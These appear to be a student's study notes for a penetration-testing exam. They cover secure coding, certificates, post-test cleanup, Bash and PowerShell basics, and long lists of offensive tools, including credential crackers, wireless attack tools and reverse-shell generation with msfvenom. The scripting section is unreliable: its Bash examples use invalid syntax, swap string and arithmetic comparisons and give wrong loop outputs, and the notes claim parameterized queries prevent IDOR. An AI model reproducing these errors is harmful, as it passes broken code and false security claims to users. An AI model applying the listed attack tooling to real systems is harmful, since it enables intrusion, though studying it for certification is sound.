- availability checklist:
- UPS/backup power
- backup internet
- patch management:
- identify, test, deploy
- classifications
- critical, security-critical, recommended, optional
- tool suites:
- Windows
- SCCM (System Center Configuration Manager)
- patching can be an availability risk too
- updating things may require reboot
- sometimes patches don't exist (legacy, ICS/SCADA, etc...)
Secure Coding:
- input validation
- client side: more efficient
- email fields usually use client side
- non-critical fields use client side
- sometimes server will still check even if client checks
- server side: more secure
- credit cards, etc should use server side (anythng critical)
- Normalization:
- string is stripped of illegal characters
- Canonicalization attack:
- input characters are encoded to evade input validation
- ex: ../ = %2e
- remove every encoded version!
- output encoding
- whenever outputing data from user to screen
- convert input to safe form to display back
- mitigate code injection and XSS attacks attempting to run scripts
- parameterized queries
- defend against SQLi and IDOR by incorporating placeholders in SQL query
- type of output encoding
*** Lookup Output encoding & Parameterized queries more ***
Implementing MFA:
- SSO: one password, one signon
- kerberos for example
- factors:
- something you know
- something you have
- something you are
- attributes:
- somewhere you are
- something you can do
- something you exhibit
- someone you know
Digital Certificates:
- Key revocation:
- CRL (Certificate Revocation List):
- maintained by CA
- single large file with all revoked certificates
- could be due to compromise on site, changing settings, etc...
- OCSP (Online Certificate Status Protocol):
- automates checking certificates in browser
- if they are revoked, etc...
- messages sent to OCSP responder via HTTP managed by CA
- check the single certificate necessary
- old browsers don't support, some new don't do it even though they can
- for this reason, use multiple methods for checking validity of certificates
- Pinning:
- put certificate inside app you're using (compile it in)
- application will compare internal certificate to cert in server
- OCSP stapling (Online Certificate Status Protocol):
- server checks if certs have been revoked
- staping puts the OCSP status in the SSL/TLS handshake that occurs
- faster than checking with CA after the fact
-HSTS: browser warns to use HTTPS
Other Technical Controls:
- secret management solution:
- password management
- process level remediation:
- changing HTTP to HTTPS
- changing Telnet to SSH
- network segmentation for IoT, VOIP, ICS/SCADA
Mitigation Strategies:
- technology
- adding new firewall, software, etc...
- LAPS
- processes
- update vuln management system, update offboarding, implement mandatory vacation
- better passwords, use hashing & encryption
- people
- train users
- hire security
Post Report Activities
Removing Shells & Tools:
- keep detailed notes of everything installed to uninstall after test
- linux: crontab/startup script
- windows: startup/regkey/dll injection/task scheduler
- remove any tools
- put everything back to how it was before pentest
Deleting Test Credentials:
- local, domain, web app accounts
- if created, delete them
- if can't be deleted, work with company to disable
Destroy Test Data:
- all info collected during engagement should be deleted
- linux: data shredding (shred command)
- windows: thirdparty tool to delete data
- can use only separate hard drive that you will shred after pentest
Client Acceptance:
- pentest doesn't stop until client agrees you're done
- remind them of benefit for pentest
- make client happy
Attestation of Findings:
- prove pentest
- required for regulatory compliances (ex: PCI DSS)
- document with following:
- summary of findings
- proof of security assessment
Lessons Learned:
- how to improve process
- document anything that went wrong and provide info to remediate next time
Retesting:
- check same thing as last time first
- make sure remediations were implemented and what new vulnerabilities there are
- pentest = spot in time assessment
Scripting Basics
Scripting Tools:
- automate things, make it easier and faster
- NO writing scripts on exam
- BUT must analyze:
- Bash: #!/bin/bash
- PowerShell: write-host (similar to echo on bash)
- Python: interpreted line by line
- Ruby: interpreted line by line
- Perl: unix scripting
- JavaScript: web
Variables:
- boolean
- integer
- float/decimal/real number
- character
- string
- Constants: never change
Loops:
- do
- indefinite
- runs at least once no matter what (unlike while or for loops)
- while
- uncertain how many times to repeat
- for
- repeat x for determined amount of times
Logic Control: conditions in loops
- boolean operator
- arithmetic operator
- if x ... then y ... else ...
- string operator
Data Structures:
- JSON:
- file format/exchange standard (human readable)
- language independent
- mostly used with JS
- Key Value Pairs:
- "firstName": "Jason" --> key on left, value on right
- Arrays:
- values of the same type in one variable
- name = [first, middle, last]
- positions of array values starts at 0
- Dictionaries:
- stores key/value pairs like an array
- phonebook = {"John":"111-1111","Mary":"222-2222"}
- CSV (Comma Separated Values):
- almost everything supports CSV files
- Lists:
- like an array but anything inside (diff variables)
- every element = index
- Trees:
- root and nodes
- non-linear
- html uses it, mermaid script
Object Oriented Programming:
- functions
- block of code that can be called to perform something
- python 'def name' = define function & name() to call it
- procedures
- function, method, routine
- classes
- groups objects
- libraries
- pieces of reusable code
- external collection
* bash is not OOP
Analyzing Scripts
- identify vulnerability in code
- identify function of code
Coding in Bash:
- #!/bin/bash
- # = comment
- variable = value
- ex: x = apple
- declare option variable = value
- ex: declare -i x = value
- array = (val1, val2, val3)
- $array[position] ==> shows value of position in array
- named/associative arrays:
- declar -A thing
- thing[apple] = "mackintosh"
- thing[orange] = "tangerine"
- ${thing[apple]} ==> shows value of position in array
- if ["$a" -eq "$b"] -- for strings
- means if a=b
- result = 1 or 0 for true/false
- eq, gt, lt, etc
- using > or < requires (("$a" < "$b"))
- if ["$a" = "$b"] -- for arithmetic
- = & == are the same
- != is not equal
- logical comparisons:
- if [condition]
then
#code here
elif [condition]
then
#code here
else
#code here
fi
flow control:
for value in {1...5}
do
echo $value
done
echo "all done"
- will echo 12345all done
counter = 1
while [$counter -lt 10]
do
echo $counter
((counter++))
done
echo "all done"
- 123456789alldone
counter = 1
until {$counter -gt 5}
do
echo $counter
((counter++))
done
echo "all done"
- 6alldone
- string operations:
- x = "this thing"
- ${x:2:4} -- prints from char 2-4 (ie: is t)
- input/output
- echo "Please enter your name:"
- read UserName
- echo "Hello $UserName"
- read/write to files:
- create file
- TempFile=$( to input instead of output
- >> puts whatever to end of a file, without overwriting file
Coding in PowerShell:
- # = comment
- <# multiline comment #>
- $variable = value
- [int]$variable = value
- [string]$variable = value
- constant: Set-Variable Pi - Option Read-Only -Valie 3.14159
- arrays: $array = @(1, 2, 3, 4)
- $array[position] -- read position from array
- dictionaries: $phonebook = @{}
- $phonebook.name = 'Jason'
- $phonebook.number = '321-1234'
- $phonebook.name -- read it
- comparissons:
- eq, ne, gt, ge, lt, le
- if (condition){#code here} else {#code here}
- flowcontrol:
- for (init; condition; repeat) {#code}
Coding in Python:
- # = comment
Coding in Perl:
Coding in JavaScript:
Coding in Ruby:
- # = comment
https://www.newthinktank.com/2016/06/shell-scripting-tutorial/
- derek banas link to bash scripting tutorial
- he has a tutorial for every language
Exploits & Automation
Exploits to Download Files:
- powershell.exe -c "URL"
- python:
- import requests
- url =
- r =
Exploit for Remote Access:
- msfvenom
- can do with any of the above learned languages (make reverse shell)
- anything with TCP/UDP in code is most likely remote access
- with PSexe or sh = reverse shell
Tool Usecases
OSINT Tools:
- whois
- nslookup
- FOCA
- theHarvester
- shodan
- maltego
- recon-ng
-censys
Scanning Tools:
- nikto
- openVAS
- nessus
- sqlmap
- open SCAP
- wapiti
- WPscan
- brakeman
- ScoutSuite
Networking Tools:
- Wireshark
- tcpdump
- hping
Wireless Tools:
- aircrack-ng
- airomon-ng
- airodump-ng
- aireplay-ng
- airocrack-ng
- kismet
- wifite
- rogue access point
- EAPHammer
- mdk4
- spooftooph
- reaver
- WiGLE
- Fern
Social Engineering Tools:
- SET
- BeEF
Remote Access Tools:
- remote access tools
- secure shell
- netcat
- ncat
- proxychains
Credential Testing Tools:
- hashcat
- medusa
- hydra
- cewl
- john the ripper
- cain
- mimikatz
- patator
- dirbuster
Web Application Tools:
- owasp zap
- burp suite
- gobuster
Cloud Tools:
- scoutsuite
- cloudbrute
- pacu
- cloud custodian
Steganography Tools:
- openstego
- steghide
- snow
- coagula
- sonic visualiser
- tineye
- metagoofil
- online SSL checkers
Debuggers:
- ollydbg
- immunity debugger
- dnu debugger
- windbg
- IDA interactive disassembler
- covenant
- searchsploit